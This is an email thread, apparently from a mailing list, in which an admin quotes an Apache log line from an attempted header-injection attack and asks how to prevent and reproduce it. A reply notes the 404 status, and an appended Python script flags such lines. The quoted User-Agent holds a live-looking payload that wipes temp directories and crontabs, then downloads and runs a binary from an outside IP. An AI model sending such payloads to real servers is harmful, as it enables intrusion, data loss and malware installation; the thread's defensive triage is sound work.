It is an attempt to exploit a specific configuration. By the fact that
Apache returned a 404 (the log line says so), you can see that the attempt was
not successful.

- Y

Sent from a gizmo with a very small keyboard and hyperactive autocorrect.
On Jul 2, 2015 8:00 AM, "Victor Sterpu" <vic...@casnt.ro> wrote:

> Hello
>
> A hacker attacked an apache2 web server by HTTP injection.
> The log shows what he has done:
> 62.1.212.154 - - [01/Jul/2015:17:02:06 +0300] "GET /phppath/cgi_wrapper
> HTTP/1.1" 404 280 "-" "() { :;};/usr/bin/perl -e 'print \"Content-Type:
> text/plain\\r\\n\\r\\nXSUCCESS!\";system(\"cd /var/tmp/ ;cd /tmp/ ; rm -rf
> /tmp/* ; rm -rf /var/tmp/* ; rm -rf /tmp/.* ; rm -rf /var/tmp/.* ; crontab
> -r ; killall -9 wget fetch curl lwp-download b f r xx y i.gif print start
> pscan pnscan ps ; wget http://80.68.94.216/sc.gif ; curl -O
> http://80.68.94.216/sc.gif ; chmod +x sc.gif ; nohup ./sc.gif & \");'"
>
> How can I prevent this in the future and how can I reproduce?
> I tried to reproduce but it is not clear how he launched this command and I
> want to know so I can test my vulnerabilities in the future.
> The path "/phppath/cgi_wrapper" doesn't exist at all.
>
> Thank you
>

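An added example, not part of either message: a Python triage script for access-log lines like the one quoted above. It flags entries whose request line, Referer or User-Agent carries the `() {` prefix and reads the status code the way the reply does; the sample lines, the client addresses and the `/cgi-bin/status` path are constructed for illustration.

```python
import re

# Apache "combined" log format. Quoted fields can contain \" escapes (as in
# the User-Agent quoted in the thread), so a plain [^"]* would cut them short.
FIELD = r'(?:[^"\\]|\\.)*'
LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    rf'"(?P<request>{FIELD})" (?P<status>\d{{3}}) \S+ '
    rf'"(?P<referer>{FIELD})" "(?P<agent>{FIELD})"$'
)
# The "() {" prefix that opens the logged User-Agent value.
MARKER = re.compile(r'\(\)\s*\{')

def triage(lines):
    """Return one finding per log line that carries the marker in any header field."""
    findings = []
    for line in lines:
        m = LINE_RE.match(line.strip())
        if not m:
            continue  # not in combined format; skipped rather than guessed at
        fields = [f for f in ("request", "referer", "agent") if MARKER.search(m[f])]
        if not fields:
            continue
        status = int(m["status"])
        parts = m["request"].split()
        if status == 404:
            verdict = "not-found"      # target path does not exist on this server
        elif 200 <= status < 300:
            verdict = "investigate"    # something answered; check what handled it
        else:
            verdict = "review"
        findings.append({"ip": m["ip"], "time": m["time"], "status": status,
                         "path": parts[1] if len(parts) > 1 else "",
                         "fields": fields, "verdict": verdict})
    return findings

# Constructed sample lines (documentation address ranges, harmless echo payload).
SAMPLE = [
    r'192.0.2.10 - - [01/Jul/2015:17:02:06 +0300] "GET /phppath/cgi_wrapper HTTP/1.1" 404 280 "-" "() { :;}; echo \"constructed\""',
    r'198.51.100.7 - - [01/Jul/2015:17:05:11 +0300] "GET /cgi-bin/status HTTP/1.1" 200 512 "-" "() { :;}; echo \"constructed\""',
    r'203.0.113.5 - - [01/Jul/2015:17:06:00 +0300] "GET /index.html HTTP/1.1" 200 1024 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for f in triage(SAMPLE):
        print(f["verdict"], f["status"], f["ip"], f["path"], f["fields"])
```

A "not-found" verdict matches the situation in the thread, where the requested path does not exist; an "investigate" verdict means the request reached something that answered and that handler should be examined.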